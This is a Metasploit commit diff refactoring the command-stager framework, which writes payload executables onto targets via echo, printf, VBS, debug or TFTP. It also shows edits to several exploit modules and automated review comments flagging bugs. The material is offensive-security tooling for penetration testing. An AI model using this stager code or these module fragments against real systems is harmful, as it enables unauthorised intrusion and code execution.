Land #2484, @zeroSteiner's refactoring for CmdStager

bug/bundler_fix
jvazquez-r7 2014-07-03 11:33:46 -05:00
commit 51695c4932
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
51 changed files with 1145 additions and 507 deletions


@ -5,93 +5,315 @@ require 'msf/core/exploit/exe'
module Msf
###
#
# This mixin provides an interface to generating cmdstagers
#
###
module Exploit::CmdStager
include Msf::Exploit::EXE
# Constant for stagers - used when creating an stager instance.
STAGERS = {
:bourne => Rex::Exploitation::CmdStagerBourne,
:debug_asm => Rex::Exploitation::CmdStagerDebugAsm,
:debug_write => Rex::Exploitation::CmdStagerDebugWrite,
:echo => Rex::Exploitation::CmdStagerEcho,
:printf => Rex::Exploitation::CmdStagerPrintf,
:vbs => Rex::Exploitation::CmdStagerVBS,
:vbs_adodb => Rex::Exploitation::CmdStagerVBS,
:tftp => Rex::Exploitation::CmdStagerTFTP
}
# Constant for decoders - used when checking the default flavor decoder.
DECODERS = {
:debug_asm => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm"),
:debug_write => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write"),
:vbs => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
:vbs_adodb => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
}
attr_accessor :stager_instance
attr_accessor :cmd_list
attr_accessor :flavor
attr_accessor :decoder
attr_accessor :exe
# Creates an instance of an exploit that uses an CMD Stager and register the
# datastore options provided by the mixin.
#
# Creates an instance of an exploit that uses an CmdStager overwrite.
#
# @param info [Hash] Hash containing information to initialize the exploit.
# @return [Msf::Module::Exploit] the exploit module.
def initialize(info = {})
super
@cmd_list = nil
@stager_instance = nil
flavors = module_flavors
flavors = STAGERS.keys if flavors.empty?
flavors.unshift('auto')
register_advanced_options(
[
OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.'])
], self.class)
end
# Executes the command stager while showing the progress. This method should
# be called from exploits using this mixin.
#
# Execute the command stager while showing the progress
#
# @param opts [Hash] Hash containing configuration options. Also allow to
# send opts to the Rex::Exploitation::CmdStagerBase constructor.
# @option opts :flavor [Symbol] The CMD Stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @option opts :delay [Float] Delay between command executions.
# @return [void]
def execute_cmdstager(opts = {})
cmd_list = generate_cmdstager(opts)
self.cmd_list = generate_cmdstager(opts)
execute_cmdstager_begin(opts)
stager_instance.setup(self)
sent = 0
total_bytes = 0
cmd_list.each { |cmd| total_bytes += cmd.length }
begin
execute_cmdstager_begin(opts)
delay = opts[:delay]
delay ||= 0.25
sent = 0
total_bytes = 0
cmd_list.each { |cmd| total_bytes += cmd.length }
cmd_list.each do |cmd|
execute_command(cmd, opts)
sent += cmd.length
delay = opts[:delay]
delay ||= 0.25
# In cases where a server has multiple threads, we want to be sure that
# commands we execute happen in the correct (serial) order.
::IO.select(nil, nil, nil, delay)
cmd_list.each do |cmd|
execute_command(cmd, opts)
sent += cmd.length
progress(total_bytes, sent)
# In cases where a server has multiple threads, we want to be sure that
# commands we execute happen in the correct (serial) order.
::IO.select(nil, nil, nil, delay)
progress(total_bytes, sent)
end
execute_cmdstager_end(opts)
ensure
stager_instance.teardown(self)
end
execute_cmdstager_end(opts)
end
#
# Generates a cmd stub based on the current target's architecture
# and operating system.
# and platform.
#
# @param opts [Hash] Hash containing configuration options. Also allow to
# send opts to the Rex::Exploitation::CmdStagerBase constructor.
# @option opts :flavor [Symbol] The CMD Stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @param pl [String] String containing the payload to execute
# @return [Array] The list of commands to execute
# @raise [ArgumentError] raised if the cmd stub can not be generated
def generate_cmdstager(opts = {}, pl = nil)
pl ||= payload.encoded
select_cmdstager(opts)
@exe = generate_payload_exe
self.exe = generate_payload_exe(:code => pl)
@stager_instance = create_stager(@exe)
cmd_list = @stager_instance.generate(opts)
self.stager_instance = create_stager
cmd_list = stager_instance.generate(opts_with_decoder(opts))
if (cmd_list.nil? or cmd_list.length < 1)
if (cmd_list.nil? || cmd_list.length < 1)
print_error("The command stager could not be generated")
raise ArgumentError
end
@cmd_list = cmd_list
cmd_list
end
#
# Show the progress of the upload
# Show the progress of the upload while cmd staging
#
# @param total [Float] The total number of bytes to send
# @param sent [Float] The number of bytes sent
# @return [void]
def progress(total, sent)
done = (sent.to_f / total.to_f) * 100
percent = "%3.2f%%" % done.to_f
print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
end
# Selects the correct cmd stager and decoder stub to use
#
# Methods to override - not used internally
# @param opts [Hash] Hash containing the options to select te correct cmd
# stager and decoder.
# @option opts :flavor [Symbol] The cmd stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @return [void]
# @raise [ArgumentError] raised if a cmd stager can not be selected or it
# isn't compatible with the target platform.
def select_cmdstager(opts = {})
self.flavor = select_flavor(opts)
raise ArgumentError, "Unable to select CMD Stager" if flavor.nil?
raise ArgumentError, "The CMD Stager '#{flavor}' isn't compatible with the target" unless compatible_flavor?(flavor)
self.decoder = select_decoder(opts)
end
# Returns a hash with the :decoder option if possible
#
# @params opts [Hash] Input Hash.
# @return [Hash] Hash with the input data and a :decoder option when
# possible.
def opts_with_decoder(opts = {})
return opts if opts.include?(:decoder)
return opts.merge(:decoder => decoder) if decoder
opts
end
# Create an instance of the flavored stager.
#
# @return [Rex::Exploitation::CmdStagerBase] The cmd stager to use.
# @raise [NoMethodError] raised if the flavor doesn't exist.
def create_stager
STAGERS[flavor].new(exe)
end
# Returns the default decoder stub for the input flavor.
#
# @param f [Symbol] the input flavor.
# @return [Symbol] the decoder.
# @return [nil] if there isn't a default decoder to use for the current
# cmd stager flavor.
def default_decoder(f)
DECODERS[f]
end
# Selects the correct cmd stager decoder to use based on three rules: (1) use
# the decoder provided in input options, (2) use the decoder provided by the
# user through datastore options, (3) select the default decoder for the
# current cmd stager flavor if available.
#
# @param opts [Hash] Hash containing the options to select te correct
# decoder.
# @option opts :decoder [String] The decoder stub to use.
# @return [String] The decoder.
# @return [nil] if a decoder can not be selected.
def select_decoder(opts = {})
return opts[:decoder] if opts.include?(:decoder)
return datastore['CMDSTAGER::DECODER'] unless datastore['CMDSTAGER::DECODER'].blank?
default_decoder(flavor)
end
# Selects the correct cmd stager to use based on three rules: (1) use the
# flavor provided in options, (2) use the flavor provided by the user
# through datastore options, (3) guess the flavor using the target platform.
#
# @param opts [Hash] Hash containing the options to select te correct cmd
# stager
# @option opts :flavor [Symbol] The cmd stager flavor to use.
# @return [Symbol] The flavor to use.
# @return [nil] if a flavor can not be selected.
def select_flavor(opts = {})
return opts[:flavor].to_sym if opts.include?(:flavor)
unless datastore['CMDSTAGER::FLAVOR'].blank? or datastore['CMDSTAGER::FLAVOR'] == 'auto'
return datastore['CMDSTAGER::FLAVOR'].to_sym
end
guess_flavor
end
# Guess the cmd stager flavor to use using information from the module,
# target or platform.
#
# @return [Symbol] The cmd stager flavor to use.
# @return [nil] if the cmd stager flavor can not be guessed.
def guess_flavor
# First try to guess a compatible flavor based on the module & target information.
unless target_flavor.nil?
case target_flavor.class.to_s
when 'Array'
return target_flavor[0].to_sym
when 'String'
return target_flavor.to_sym
when 'Symbol'
return target_flavor
end
end
# Second try to guess a compatible flavor based on the target platform.
return nil unless target_platform.names.length == 1
c_platform = target_platform.names.first
case c_platform
when /linux/i
:bourne
when /osx/i
:bourne
when /unix/i
:bourne
when /win/i
:vbs
else
nil
end
end
# Returns all the compatible stager flavors specified by the module and each
# of it's targets.
#
# @return [Array] the list of all compatible cmd stager flavors.
def module_flavors
flavors = []
flavors += Array(module_info['CmdStagerFlavor']) if module_info['CmdStagerFlavor']
targets.each do |target|
flavors += Array(target.opts['CmdStagerFlavor']) if target.opts['CmdStagerFlavor']
end
flavors.uniq!
flavors.map { |flavor| flavor.to_s }
end
# Returns the compatible stager flavors for the current target or module.
#
# @return [Array] the list of compatible cmd stager flavors.
# @return [Symbol] the compatible cmd stager flavor.
# @return [String] the compatible cmd stager flavor.
# @return [nil] if there isn't any compatible flavor defined.
def target_flavor
return target.opts['CmdStagerFlavor'] if target && target.opts['CmdStagerFlavor']
return module_info['CmdStagerFlavor'] if module_info['CmdStagerFlavor']
nil
end
# Answers if the input flavor is compatible with the current target or module.
#
# @param f [Symbol] The flavor to check
# @returns [Boolean] true if compatible, false otherwise.
def compatible_flavor?(f)
return true if target_flavor.nil?
case target_flavor.class.to_s
when 'String'
return true if target_flavor == f.to_s
when 'Array'
target_flavor.each { |tr| return true if tr.to_sym == f }
when 'Symbol'
return true if target_flavor == f
end
false
end
# Code to execute before the cmd stager stub. This method is designed to be
# overriden by a module this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_cmdstager_begin(opts)
end
# Code to execute after the cmd stager stub. This method is designed to be
# overriden by a module this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_cmdstager_end(opts)
end
end
# Code to execute each command from the. This method is designed to be
# overriden by a module using this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_command(cmd, opts)
raise NotImplementedError
end
end
end
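Review bot: `create_stager` calls `STAGERS[flavor].new(exe)` without checking that the flavor is a key of `STAGERS`, so an unknown `opts[:flavor]` or a misspelled `CmdStagerFlavor` surfaces as a `NoMethodError` on nil rather than the `ArgumentError` that `select_cmdstager` raises for its other failure cases. `compatible_flavor?` returns true whenever `target_flavor` is nil, so nothing earlier rejects the value. I would add `raise ArgumentError, "Unknown CMD Stager '#{flavor}'" unless STAGERS.key?(flavor)` to `select_cmdstager`. Separately, `module_flavors` calls `uniq!` before converting to strings, so `'vbs'` and `:vbs` both survive; `flavors.map(&:to_s).uniq` avoids the duplicate. The YARD tags `@params` and `@returns` should read `@param` and `@return`.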


@ -1,21 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerBourne
include Msf::Exploit::CmdStager
def create_stager(exe)
Rex::Exploitation::CmdStagerBourne.new(exe)
end
end
end


@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerDebugAsm
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerDebugAsm.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end


@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerDebugWrite
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerDebugWrite.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end


@ -1,34 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerEcho.
#
# This stager uses the echo's "-e" flag, that enable interpretation of
# backslash escapes, to drop an ELF with the payload embedded to disk.
# The "-e" flag is usually available on linux environments. This stager
# has been found useful on restricted linux based embedded devices, and
# should work on either:
# * Systems with busy box's echo binary somewhere in $PATH.
# * Systems with bash/zsh whose echo builtin supports -en flags.
# * Systems with GNU coreutils echo which supports -en flags.
#
####
module Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
# Initializes a CmdStagerEcho instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerEcho] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerEcho.new(exe)
end
end
end


@ -1,27 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end


@ -1,67 +0,0 @@
# -*- coding: binary -*-
require 'rex/text'
require 'msf/core/exploit/tftp'
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::TFTPServer
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'TFTPHOST', [ false, 'The address of the machine hosting the file via TFTP.' ]),
OptString.new( 'TFTPRSRC', [ false, 'The filename of the TFTP-hosted resource.' ]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerTFTP.new(exe)
end
def execute_cmdstager(opts = {})
tftphost = datastore['TFTPHOST']
tftphost ||= datastore['SRVHOST']
tftphost ||= datastore['LHOST']
@exe_tag = datastore['TFTPRSRC']
@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
super
end
#
# Start the service and register the file
#
def execute_cmdstager_begin(opts)
start_service(@exe_tag, @exe)
end
#
# Stop the service
#
def execute_cmdstager_end(opts)
stop_service
end
def payload_exe
return nil if not @stager_instance
@stager_instance.payload_exe
end
end
end


@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerVBS.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end


@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerVBS::ADODB
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerVBS.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end


@ -19,14 +19,6 @@ require 'msf/core/exploit/php_exe'
# CmdStagers
require 'msf/core/exploit/cmdstager'
require 'msf/core/exploit/cmdstager_vbs'
require 'msf/core/exploit/cmdstager_vbs_adodb'
require 'msf/core/exploit/cmdstager_debug_write'
require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol
require 'msf/core/exploit/tcp'


@ -172,6 +172,19 @@ class CmdStagerBase
nil
end
# Should be overriden if the cmd stager needs to setup anything
# before it's executed
def setup(mod = nil)
end
#
# Should be overriden if the cmd stager needs to do any clenaup
#
def teardown(mod = nil)
end
end
end
end


@ -27,10 +27,19 @@ class CmdStagerTFTP < CmdStagerBase
def initialize(exe)
super
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end
def setup(mod)
tftp = Rex::Proto::TFTP::Server.new
tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
tftp.start
mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
def teardown(mod = nil)
tftp.stop
end
#
# We override compress commands just to stick in a few extra commands
@ -54,8 +63,9 @@ class CmdStagerTFTP < CmdStagerBase
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
# the start command being issued separately so that it can ignore it :)
attr_reader :exe
attr_reader :payload_exe
attr_accessor :tftp
end
end
end
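Review bot: `setup` assigns the server to a local variable (`tftp = Rex::Proto::TFTP::Server.new`), so the `tftp` accessor added in the second hunk stays nil and `teardown`'s `tftp.stop` raises `NoMethodError` while the listener is left running. The mixin's `execute_cmdstager` calls `teardown` from an `ensure`, so that error would also mask whatever exception triggered the cleanup. Use `self.tftp = Rex::Proto::TFTP::Server.new` in `setup` and `tftp.stop if tftp` in `teardown`. The file is registered under a fresh `Rex::Text.rand_text_alphanumeric(8)` name that is not stored anywhere; whether the generated commands can refer to that name is not visible in these hunks and is worth confirming.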


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -51,8 +51,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -81,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:concat_operator => " && "
)
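Review bot: The flavor is pinned only at the call site (`:flavor => :echo`) and the `CMDSTAGER::FLAVOR` option is deregistered, whereas the VBS and TFTP modules in this commit declare a `'CmdStagerFlavor'` entry in their metadata. Declaring `'CmdStagerFlavor' => 'echo'` in the module info would keep the two styles consistent and give `compatible_flavor?` something to check, since that method accepts any flavor when no `CmdStagerFlavor` is set. The same applies to the other modules in this commit that replace `CmdStagerEcho` with `CmdStager`. The `initialize` and `exploit` bodies continue outside the hunks.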


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,8 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:concat_operator => " && "
)


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -109,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 92
)
end


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -62,8 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{peer} - Exploiting...")
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
end


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
test_login
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
# Sends an HTTP request with authorization header to the router


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -168,7 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote
execute_cmdstager(
:noargs => @no_args,
:temp => @upload_path,
:enc_format => @encoding_format
:enc_format => @encoding_format,
:flavor => :echo
)
end


@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'HP SiteScope 11.20 / Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
],
[ 'HP SiteScope 11.20 / Linux',


@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
@ -41,19 +41,23 @@ class Metasploit3 < Msf::Exploit::Remote
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X86_64
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X86_64
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'vbs'
}],
],
'Privileged' => false,
@ -121,11 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
def setup_stager
case target.opts['Platform']
when "linux" then opts = { :temp => './', :linemax => 2800 }
when "win" then opts = { :temp => '.', :linemax => 2800 }
end
execute_cmdstager(opts)
execute_cmdstager(:temp => './', :linemax => 2800)
end
@ -194,8 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@cookie = ''
extend Msf::Exploit::CmdStagerBourne if target.opts['Platform'] == "linux"
setup_stager
end
end


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
# Tested on Hyperic HQ versions 4.5.2-win32 and 4.6.6-win32 on Windows XP SP3 and Ubuntu 10.04
['Automatic', {} ],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
],
@ -247,7 +247,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# login
@ -281,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
# send payload
case @my_target['Platform']
when 'win'
print_status("#{peer} - Sending VBS stager...")
print_status("#{peer} - Sending command stager...")
execute_cmdstager({:linemax => 2049})
when 'unix'
print_status("#{peer} - Sending UNIX payload...")


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -33,10 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
],
'Platform' => %w{ win linux unix },
'Targets' =>
'Targets' =>
[
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}],
['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
],
'DisclosureDate' => 'Jan 18 2013',
@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
case target['Platform']
when 'win'
print_status("#{rhost}:#{rport} - Sending VBS stager...")
print_status("#{rhost}:#{rport} - Sending command stager...")
execute_cmdstager({:linemax => 2049})
when 'unix'
print_status("#{rhost}:#{rport} - Sending payload...")


@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => %w{ win unix },
'Targets' =>
[
[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'} ],
[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'} ],
[ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
],
'DisclosureDate' => 'Dec 06 2012'))
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
case target['Platform']
when 'win'
print_status("#{rhost}:#{rport} - Sending VBS stager...")
print_status("#{rhost}:#{rport} - Sending command stager...")
execute_cmdstager({:linemax=>500})
when 'unix'


@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp'
}
],
['Linux Universal',
@ -88,10 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")
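Review bot: `@payload_exe = payload_exe` still calls `payload_exe`, which was defined by the `Exploit::CmdStagerTFTP` mixin that this commit deletes, and the refactored `Exploit::CmdStager` shown on this page does not define it. Unless another included module provides the method, this line raises `NameError` once the stager has run. The value is reachable through the stager object, e.g. `@payload_exe = stager_instance.payload_exe`. The same line appears in the other modules that switch from `CmdStagerTFTP` to `CmdStager`. `windows_stager` continues past the end of the hunk.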


@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
